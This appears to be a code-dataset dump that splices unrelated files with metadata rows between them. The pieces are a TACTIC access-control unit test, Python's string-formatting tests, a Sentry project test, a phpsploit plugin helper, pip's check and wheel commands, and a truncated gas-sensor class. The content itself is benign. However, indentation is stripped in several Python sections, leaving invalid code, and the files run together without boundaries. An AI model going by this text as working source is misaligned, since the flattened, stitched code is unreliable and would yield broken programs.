<rule group="project" code='sample3d' access='allow'/>
<rule value='5' search_type='sthpw/task' column='priority' op='!=' group='search_filter' project='sample3d'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
priorities = SObject.get_values(tasks,'priority', unique=True)
#project_codes = SObject.get_values(tasks,'project_code', unique=True)
for p in priorities:
self.assertEqual(True, p != 5)
try:
Project.set_project('unittest')
except SecurityException as e:
# should get an SecurityException
self.assertEqual('User [unittest_guy] is not permitted to view project [unittest]', e.__str__())
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
except Exception as e:
print("Error : %s", str(e))
else:
# this should not happen
raise Exception('unittest_guy should not be allowed to use Project unittest here.')
# One should be able to insert a task that is outside the query restriction of the above rule
task = SearchType.create('sthpw/task')
task.set_sobject_value(self.person)
task.set_value('assigned', 'made_up_login')
task.set_value('project_code', 'sample3d')
task.set_value('description', 'a new task')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
self.assertEqual('made_up_login', task.get_value('assigned'))
# DEPRECATED: column level security has been disabled for now (for
# performance reasons)
def _test_sobject_access_manager(self):
'''test a more realistic example'''
# create a test person
person = Person.create("Donald", "Duck", "DisneyLand", "A duck!!!")
self.person = person
for project_code in ['unittest','unittest','sample3d']:
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_guy')
task.set_value('project_code', project_code)
task.set_value('description', 'do something good')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
# an extra task for list-based search_filter test
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_gal')
task.set_value('project_code', 'unittest')
task.set_value('description', 'do something good')
task.set_value('process', 'unittest2')
task.set_value('context', 'unittest2')
task.commit()
# add these rules to the current user
rules = """
<rules>
<rule group="sobject_column" default="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_first" access="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_last" access="deny"/>
<rule group="sobject_column" search_type="unittest/person" column="nationality" access="deny"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
# disable admin for this test
access_manager.set_admin(False)
# should succeed
person.set_value("name_first", "Donny")
# should fail
try:
person.set_value("name_last", "Ducky")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
# should succeed
name_last = person.get_value("name_last")
self.assertEqual("Duck", name_last)
# should fail
# DISABLED for now since Search._check_value_security() is commented out
"""
try:
nationality = person.get_value("nationality")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
"""
# disable admin for this test
access_manager.set_admin(True)
def _test_access_manager(self):
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule group='sobject' key='corporate/budget' access='allow'/>
<rule group='sobject' key='corporate/salary' access='allow'/>
<rule group='sobject' key='prod/asset' access='edit'/>
<rule group='sobject' search_type='sthpw/note' project='sample3d' access='edit'/>
<group type='url' default='deny'>
<rule key='/tactic/bar/Partner' access='view'/>
<rule key='/tactic/bar/External' access='view'/>
</group>
<rule group='sobject' search_type='prod/layer' project='sample3d' access='view'/>
<rule column='description' search_type='prod/shot' access='view' group='sobject_column'/>
<group type='sobject_column' default='edit'>
<rule key='prod/asset|director_notes' access='deny'/>
<rule key='prod/asset|sensitive_data' access='deny'/>
</group>
<rule group='search_type' code='prod/asset' access='allow'/>
<rule group='search_type' code='sthpw/note' project='unittest' access='edit'/>
<rule group='search_type' code='unittest/person' project='unittest' access='allow'/>
<rule group='builtin' key='view_site_admin' access='allow'/>
<rule group='builtin' key='export_all_csv' project='unittest' access='allow'/>
<rule group='builtin' key='import_csv' access='allow'/>
<rule group='builtin' key='retire_delete' project='*' access='allow'/>
<rule group='builtin' key='view_side_bar' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml)
        # Try mixing in a 2nd login_group rule with a project override, mimicking a
        # login_group with a project_code. The project group is special: it doesn't
        # get the usual project_override treatment.
xml2 = Xml()
xml2.read_string('''
<rules>
<rule group="project" code="sample3d" access="allow"/>
<rule group="project" code="unittest" access="allow"/>
<rule group='builtin' key='view_side_bar' project='sample3d' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml2)
access_manager.print_rules('project')
test = access_manager.check_access('builtin', 'view_site_admin','allow')
self.assertEqual(test, True)
Project.set_project('sample3d')
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, False)
# old way of checking project
test = access_manager.check_access('project', 'sample3d','allow')
self.assertEqual(test, True)
Project.set_project('unittest')
# old way should work as well
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, True)
# default to the system's hardcoded deny for builtin
test = access_manager.check_access('builtin', 'export_all_csv','allow', default='deny')
self.assertEqual(test, True)
# this is the new way to control per project csv export
keys = [{'key':'export_all_csv', 'project': 'unittest'}, {'key':'export_all_csv','project': '*'}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
keys = [{'key':'import_csv', 'project': '*'}, {'key':'import_csv','project': Project.get_project_code()}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'view_side_bar','allow')
self.assertEqual(test, True)
key = { "project": 'unittest', 'key':'view_side_bar' }
key1 = { "project": 'sample3d', 'key':'view_side_bar' }
key2 = { "project": "*",'key': 'view_side_bar' }
keys = [key, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
keys = [key1, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
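        # check_access with a list of keys passes if *any* key matches a rule,
        # so a {'project': '*'} entry acts as a wildcard fallback alongside
        # the project-specific key.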
test = access_manager.check_access('builtin', 'retire_delete','allow')
self.assertEqual(test, True)
# test sensitive sobject
test = access_manager.get_access('sobject', 'corporate/budget')
self.assertEqual(test, "allow")
# test allowed sobject
test = access_manager.get_access('sobject', 'prod/asset')
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', [{'search_type':'sthpw/note', 'project':'sample3d'}])
self.assertEqual(test, "edit")
# test url
test = access_manager.get_access('url', '/tactic/bar/Partner')
self.assertEqual(test, "view")
# test with access values ... a more typical usage
test = access_manager.check_access('sobject','prod/asset','view')
self.assertEqual(test, True)
test = access_manager.check_access('sobject','corporate/budget','edit')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column', 'prod/asset|director_notes','deny')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'edit')
self.assertEqual(test, False)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'view')
self.assertEqual(test, True)
test = access_manager.get_access('sobject', {'search_type':'sthpw/note', 'project':'sample3d'} )
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', {'search_type':'sthpw/note'} )
self.assertEqual(test, None)
test = access_manager.get_access('sobject', {'search_type':'prod/layer', 'project':'sample3d'} )
self.assertEqual(test, "view")
test = access_manager.get_access('sobject', 'prod/layer' )
self.assertEqual(test, None)
Project.set_project('sample3d')
# security version 2 uses group = search_type
asset = SearchType.create('prod/asset')
asset.set_value('name','unit test obj')
asset.commit(triggers=False)
# replace the access manager with this
Environment.get_security()._access_manager = access_manager
test = access_manager.check_access('search_type',{'search_type':'prod/asset','project':'sample3d'},'delete')
self.assertEqual(test, False)
asset.delete()
note = SearchType.create('sthpw/note')
note.set_value('note','unit test note obj')
note.set_value('project_code','unittest')
note.commit(triggers=False)
test = access_manager.get_access('search_type', [{'code':'sthpw/note', 'project':'unittest'}] )
self.assertEqual(test, 'edit')
msg = ''
# delete of unittest note should fail
try:
note.delete()
except SObjectException as e:
msg = 'delete error'
self.assertEqual(msg, 'delete error')
note = SearchType.create('sthpw/note')
note.set_value('note','unit test sample3d note obj')
note.set_value('project_code','sample3d')
note.commit(triggers=False)
# this should pass since it's a sthpw/ prefix
note.delete()
test = access_manager.check_access('search_type',{'search_type':'sthpw/note','project':'unittest'},'delete')
self.assertEqual(test, False)
self.assertEqual('unittest_guy', Environment.get_user_name())
def _test_crypto(self):
key = CryptoKey()
key.generate()
# test verifying a string
test_string = "Holy Moly"
signature = key.get_signature(test_string)
check = key.verify(test_string, signature)
self.assertEqual(True, check)
# verify an incorrect string
check = key.verify("whatever", signature)
self.assertEqual(False, check)
# encrypt and decrypt a string
test_string = "This is crazy"
coded = key.encrypt(test_string)
# create a new key
private_key = key.get_private_key()
key2 = CryptoKey()
key2.set_private_key(private_key)
test_string2 = key2.decrypt(coded)
self.assertEqual(test_string, test_string2)
def _test_access_level(self):
security = Environment.get_security()
from pyasm.security import get_security_version
security_version = get_security_version()
projects = Search.eval('@SOBJECT(sthpw/project)')
if security_version >= 2:
for project in projects:
key = { "code": project.get_code() }
key2 = { "code": "*" }
keys = [key, key2]
default = "deny"
# other than sample3d, unittest as allowed above, a default low access level user
# should not see other projects
access = security.check_access("project", keys, "allow", default=default)
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, True)
if project.get_code() in ['sample3d','unittest']:
self.assertEqual(access, True)
else:
self.assertEqual(access, False)
else:
raise SecurityException('Please test with security version 2. Set it in your config file')
def _test_guest_allow(self):
        '''Test the Config tag allow_guest inside the security tag.
        Note: since it is hard to emulate the AppServer class,
        this is based on the logic handled in _get_display
        of BaseAppServer.
1. If allow_guest is false, then it is necessary that
Sudo is instantiated.
2. If allow_guest is true, then it is necessary that
guest login rules are added and login_as_guest is
executed.
'''
security = Security()
Environment.set_security(security)
#1. allow_guest is false
fail = False
try:
sudo = Sudo()
except Exception as e:
fail = True
self.assertEqual( False, fail )
sudo.exit()
key = [{'code': "*"}]
project_access = security.check_access("project", key, "allow")
self.assertEqual(project_access, False)
#2. allow_guest is true
Site.set_site("default")
try:
security.login_as_guest()
ticket_key = security.get_ticket_key()
access_manager = security.get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule column="login" value="{$LOGIN}" search_type="sthpw/login" access="deny" op="!=" group="search_filter"/>
<rule group="project" code="default" access="allow"/>
</rules>
''')
access_manager.add_xml_rules(xml)
finally:
Site.pop_site()
default_key = [{'code': "default"}]
project_access = security.check_access("project", default_key, "allow")
self.assertEqual(project_access, True)
        unittest_key = [{'code': "sample3d"}]
project_access = security.check_access("project", unittest_key, "allow")
self.assertEqual(project_access, False)
if __name__ == "__main__":
unittest.main()
| epl-1.0 | -1,314,311,670,555,871,200 | 34.698225 | 157 | 0.592408 | false |
xbmc/atv2 | xbmc/lib/libPython/Python/Lib/test/test_format.py | 8 | 10198 | from test.test_support import verbose, have_unicode, TestFailed
import sys
# test string formatting operator (I am not sure if this is being tested
# elsewhere but, surely, some of the given cases are *not* tested because
# they crash python)
# test on unicode strings as well
overflowok = 1
def testformat(formatstr, args, output=None):
if verbose:
if output:
print "%s %% %s =? %s ..." %\
(repr(formatstr), repr(args), repr(output)),
else:
print "%s %% %s works? ..." % (repr(formatstr), repr(args)),
try:
result = formatstr % args
except OverflowError:
if not overflowok:
raise
if verbose:
print 'overflow (this is fine)'
else:
if output and result != output:
if verbose:
print 'no'
print "%s %% %s == %s != %s" %\
(repr(formatstr), repr(args), repr(result), repr(output))
else:
if verbose:
print 'yes'
def testboth(formatstr, *args):
testformat(formatstr, *args)
if have_unicode:
testformat(unicode(formatstr), *args)
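# e.g. testboth("%d", 42, "42") runs testformat() twice, once with the str
# format and (when unicode is available) once with the unicode format.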
testboth("%.1d", (1,), "1")
testboth("%.*d", (sys.maxint,1)) # expect overflow
testboth("%.100d", (1,), '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.117x", (1,), '0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%#.118x", (1,), '0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001')
testboth("%f", (1.0,), "1.000000")
# these are trying to test the limits of the internal magic-number-length
# formatting buffer, if that number changes then these tests are less
# effective
testboth("%#.*g", (109, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+49/3.))
testboth("%#.*g", (110, -1.e+100/3.))
# test some ridiculously large precision, expect overflow
testboth('%12.*f', (123456, 1.0))
# Formatting of long integers. Overflow is not ok
overflowok = 0
testboth("%x", 10L, "a")
testboth("%x", 100000000000L, "174876e800")
testboth("%o", 10L, "12")
testboth("%o", 100000000000L, "1351035564000")
testboth("%d", 10L, "10")
testboth("%d", 100000000000L, "100000000000")
big = 123456789012345678901234567890L
testboth("%d", big, "123456789012345678901234567890")
testboth("%d", -big, "-123456789012345678901234567890")
testboth("%5d", -big, "-123456789012345678901234567890")
testboth("%31d", -big, "-123456789012345678901234567890")
testboth("%32d", -big, " -123456789012345678901234567890")
testboth("%-32d", -big, "-123456789012345678901234567890 ")
testboth("%032d", -big, "-0123456789012345678901234567890")
testboth("%-032d", -big, "-123456789012345678901234567890 ")
testboth("%034d", -big, "-000123456789012345678901234567890")
testboth("%034d", big, "0000123456789012345678901234567890")
testboth("%0+34d", big, "+000123456789012345678901234567890")
testboth("%+34d", big, " +123456789012345678901234567890")
testboth("%34d", big, " 123456789012345678901234567890")
testboth("%.2d", big, "123456789012345678901234567890")
testboth("%.30d", big, "123456789012345678901234567890")
testboth("%.31d", big, "0123456789012345678901234567890")
testboth("%32.31d", big, " 0123456789012345678901234567890")
big = 0x1234567890abcdef12345L # 21 hex digits
testboth("%x", big, "1234567890abcdef12345")
testboth("%x", -big, "-1234567890abcdef12345")
testboth("%5x", -big, "-1234567890abcdef12345")
testboth("%22x", -big, "-1234567890abcdef12345")
testboth("%23x", -big, " -1234567890abcdef12345")
testboth("%-23x", -big, "-1234567890abcdef12345 ")
testboth("%023x", -big, "-01234567890abcdef12345")
testboth("%-023x", -big, "-1234567890abcdef12345 ")
testboth("%025x", -big, "-0001234567890abcdef12345")
testboth("%025x", big, "00001234567890abcdef12345")
testboth("%0+25x", big, "+0001234567890abcdef12345")
testboth("%+25x", big, " +1234567890abcdef12345")
testboth("%25x", big, " 1234567890abcdef12345")
testboth("%.2x", big, "1234567890abcdef12345")
testboth("%.21x", big, "1234567890abcdef12345")
testboth("%.22x", big, "01234567890abcdef12345")
testboth("%23.22x", big, " 01234567890abcdef12345")
testboth("%-23.22x", big, "01234567890abcdef12345 ")
testboth("%X", big, "1234567890ABCDEF12345")
testboth("%#X", big, "0X1234567890ABCDEF12345")
testboth("%#x", big, "0x1234567890abcdef12345")
testboth("%#x", -big, "-0x1234567890abcdef12345")
testboth("%#.23x", -big, "-0x001234567890abcdef12345")
testboth("%#+.23x", big, "+0x001234567890abcdef12345")
testboth("%# .23x", big, " 0x001234567890abcdef12345")
testboth("%#+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+26.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+27.23X", big, "+0X001234567890ABCDEF12345 ")
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
# next one gets two leading zeroes from precision, and another from the
# 0 flag and the width
testboth("%#+027.23X", big, "+0X0001234567890ABCDEF12345")
# same, except no 0 flag
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
big = 012345670123456701234567012345670L # 32 octal digits
testboth("%o", big, "12345670123456701234567012345670")
testboth("%o", -big, "-12345670123456701234567012345670")
testboth("%5o", -big, "-12345670123456701234567012345670")
testboth("%33o", -big, "-12345670123456701234567012345670")
testboth("%34o", -big, " -12345670123456701234567012345670")
testboth("%-34o", -big, "-12345670123456701234567012345670 ")
testboth("%034o", -big, "-012345670123456701234567012345670")
testboth("%-034o", -big, "-12345670123456701234567012345670 ")
testboth("%036o", -big, "-00012345670123456701234567012345670")
testboth("%036o", big, "000012345670123456701234567012345670")
testboth("%0+36o", big, "+00012345670123456701234567012345670")
testboth("%+36o", big, " +12345670123456701234567012345670")
testboth("%36o", big, " 12345670123456701234567012345670")
testboth("%.2o", big, "12345670123456701234567012345670")
testboth("%.32o", big, "12345670123456701234567012345670")
testboth("%.33o", big, "012345670123456701234567012345670")
testboth("%34.33o", big, " 012345670123456701234567012345670")
testboth("%-34.33o", big, "012345670123456701234567012345670 ")
testboth("%o", big, "12345670123456701234567012345670")
testboth("%#o", big, "012345670123456701234567012345670")
testboth("%#o", -big, "-012345670123456701234567012345670")
testboth("%#.34o", -big, "-0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%# .34o", big, " 0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+37.34o", big, "+0012345670123456701234567012345670 ")
testboth("%#+37.34o", big, " +0012345670123456701234567012345670")
# next one gets one leading zero from precision
testboth("%.33o", big, "012345670123456701234567012345670")
# base marker shouldn't change that, since "0" is redundant
testboth("%#.33o", big, "012345670123456701234567012345670")
# but reduce precision, and base marker should add a zero
testboth("%#.32o", big, "012345670123456701234567012345670")
# one leading zero from precision, and another from "0" flag & width
testboth("%034.33o", big, "0012345670123456701234567012345670")
# base marker shouldn't change that
testboth("%0#34.33o", big, "0012345670123456701234567012345670")
# Some small ints, in both Python int and long flavors).
testboth("%d", 42, "42")
testboth("%d", -42, "-42")
testboth("%d", 42L, "42")
testboth("%d", -42L, "-42")
testboth("%#x", 1, "0x1")
testboth("%#x", 1L, "0x1")
testboth("%#X", 1, "0X1")
testboth("%#X", 1L, "0X1")
testboth("%#o", 1, "01")
testboth("%#o", 1L, "01")
testboth("%#o", 0, "0")
testboth("%#o", 0L, "0")
testboth("%o", 0, "0")
testboth("%o", 0L, "0")
testboth("%d", 0, "0")
testboth("%d", 0L, "0")
testboth("%#x", 0, "0x0")
testboth("%#x", 0L, "0x0")
testboth("%#X", 0, "0X0")
testboth("%#X", 0L, "0X0")
testboth("%x", 0x42, "42")
testboth("%x", -0x42, "-42")
testboth("%x", 0x42L, "42")
testboth("%x", -0x42L, "-42")
testboth("%o", 042, "42")
testboth("%o", -042, "-42")
testboth("%o", 042L, "42")
testboth("%o", -042L, "-42")
# Test exception for unknown format characters
if verbose:
print 'Testing exceptions'
def test_exc(formatstr, args, exception, excmsg):
try:
testformat(formatstr, args)
except exception, exc:
if str(exc) == excmsg:
if verbose:
print "yes"
else:
if verbose: print 'no'
print 'Unexpected ', exception, ':', repr(str(exc))
except:
if verbose: print 'no'
print 'Unexpected exception'
raise
else:
raise TestFailed, 'did not get expected exception: %s' % excmsg
test_exc('abc %a', 1, ValueError,
"unsupported format character 'a' (0x61) at index 5")
if have_unicode:
test_exc(unicode('abc %\u3000','raw-unicode-escape'), 1, ValueError,
"unsupported format character '?' (0x3000) at index 5")
test_exc('%d', '1', TypeError, "int argument required")
test_exc('%g', '1', TypeError, "float argument required")
test_exc('no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc('no format', u'1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', u'1', TypeError,
"not all arguments converted during string formatting")
class Foobar(long):
def __oct__(self):
# Returning a non-string should not blow up.
return self + 1
test_exc('%o', Foobar(), TypeError,
"expected string or Unicode object, long found")
if sys.maxint == 2**31-1:
# crashes 2.2.1 and earlier:
try:
"%*d"%(sys.maxint, -127)
except MemoryError:
pass
else:
raise TestFailed, '"%*d"%(sys.maxint, -127) should fail'
| gpl-2.0 | 2,739,807,393,355,433,500 | 40.120968 | 149 | 0.68533 | false |
BuildingLink/sentry | tests/sentry/models/test_project.py | 8 | 1099 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.models import OrganizationMember, OrganizationMemberTeam
from sentry.testutils import TestCase
class ProjectTest(TestCase):
def test_member_set_simple(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
member = OrganizationMember.objects.get(
user=user,
organization=org,
)
OrganizationMemberTeam.objects.create(
organizationmember=member,
team=team,
)
assert list(project.member_set.all()) == [member]
def test_inactive_global_member(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
OrganizationMember.objects.get(
user=user,
organization=org,
)
assert list(project.member_set.all()) == []
| bsd-3-clause | -2,431,338,429,692,419,600 | 29.527778 | 68 | 0.626934 | false |
shiney-wh/phpsploit | src/api/plugin.py | 2 | 1672 | import re
from core import plugins
class Plugin:
"""Triggering plugin attributes.
Get attributes of the currently running plugin.
This object is generally imported like this:
>>> from api import plugin
The following attributes descriptions include some
examples, based on an imaginative plugin located at
'/home/user/phpsploit/plugins/parent_dir/foobar/' path.
ATTRIBUTES:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin's docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instanciate plugin object (for use within python API)
plugin = Plugin()
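# Usage sketch (attribute access is delegated to the running plugin):
#
#   >>> from api import plugin
#   >>> plugin.name      # resolved via __getattr__ -> plugins.current_plugin
#   'foobar'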
| gpl-3.0 | -5,773,520,445,400,197,000 | 25.967742 | 75 | 0.596292 | false |
cynngah/uofthacksIV | generate-jobs/lib/python2.7/site-packages/pip/commands/check.py | 336 | 1382 | import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
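        # Shapes, as consumed below: missing_reqs_dict maps "name==version" to
        # a list of missing requirements; incompatible_reqs_dict maps the same
        # key to (requirement, actual_distribution) pairs.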
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
| mit | -1,317,605,868,300,513,500 | 34.435897 | 78 | 0.61288 | false |
paran0ids0ul/infernal-twin | build/pip/build/lib.linux-i686-2.7/pip/commands/wheel.py | 239 | 7442 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import os
import warnings
from pip.basecommand import RequirementCommand
from pip.index import PackageFinder
from pip.exceptions import CommandError, PreviousBuildDirError
from pip.req import RequirementSet
from pip.utils import import_or_raise, normalize_path
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip8Warning
from pip.wheel import WheelCache, WheelBuilder
from pip import cmdoptions
DEFAULT_WHEEL_DIR = os.path.join(normalize_path(os.curdir), 'wheelhouse')
logger = logging.getLogger(__name__)
class WheelCommand(RequirementCommand):
"""
Build Wheel archives for your requirements and dependencies.
Wheel is a built-package format, and offers the advantage of not
recompiling your software during every install. For more details, see the
wheel docs: http://wheel.readthedocs.org/en/latest.
Requirements: setuptools>=0.8, and wheel.
'pip wheel' uses the bdist_wheel setuptools extension from the wheel
package to build individual wheels.
"""
name = 'wheel'
usage = """
%prog [options] <requirement specifier> ...
%prog [options] -r <requirements file> ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Build wheels from your requirements.'
def __init__(self, *args, **kw):
super(WheelCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-w', '--wheel-dir',
dest='wheel_dir',
metavar='dir',
default=DEFAULT_WHEEL_DIR,
help=("Build wheels into <dir>, where the default is "
"'<cwd>/wheelhouse'."),
)
cmd_opts.add_option(cmdoptions.use_wheel())
cmd_opts.add_option(cmdoptions.no_use_wheel())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(
'--build-option',
dest='build_options',
metavar='options',
action='append',
help="Extra arguments to be supplied to 'setup.py bdist_wheel'.")
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.download_cache())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the 'bdist_wheel' command.")
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(cmdoptions.no_clean())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def check_required_packages(self):
import_or_raise(
'wheel.bdist_wheel',
CommandError,
"'pip wheel' requires the 'wheel' package. To fix this, run: "
"pip install wheel"
)
pkg_resources = import_or_raise(
'pkg_resources',
CommandError,
"'pip wheel' requires setuptools >= 0.8 for dist-info support."
" To fix this, run: pip install --upgrade setuptools"
)
if not hasattr(pkg_resources, 'DistInfoDistribution'):
raise CommandError(
"'pip wheel' requires setuptools >= 0.8 for dist-info "
"support. To fix this, run: pip install --upgrade "
"setuptools"
)
def run(self, options, args):
self.check_required_packages()
cmdoptions.resolve_wheel_no_use_binary(options)
cmdoptions.check_install_build_global(options)
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
with self._build_session(options) as session:
finder = PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=None,
ignore_dependencies=options.ignore_dependencies,
ignore_installed=True,
isolated=options.isolated_mode,
session=session,
wheel_cache=wheel_cache,
wheel_download_dir=options.wheel_dir
)
self.populate_requirement_set(
requirement_set, args, options, finder, session, self.name,
wheel_cache
)
if not requirement_set.has_requirements:
return
try:
# build wheels
wb = WheelBuilder(
requirement_set,
finder,
build_options=options.build_options or [],
global_options=options.global_options or [],
)
if not wb.build():
raise CommandError(
"Failed to build one or more wheels"
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
if not options.no_clean:
requirement_set.cleanup_files()
| gpl-3.0 | 8,197,726,181,677,401,000 | 35.660099 | 79 | 0.563558 | false |
aldarionsevero/datalogger-ROS-rasp | sensors/mq135_sensor.py | 1 | 1548 | # Copyright (c) 2015 "aldarionsevero Lucas Severo Alves
# <[email protected]>""
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from sensor import Sensor
import botbook_mcp3002 as mcp
class Mq135Sensor(Sensor):
"""docstring for Mq135Sensor"""
def __init__(self):
Sensor.__init__(self)
self.sense_pin1 = 0 # pin 7 rasp
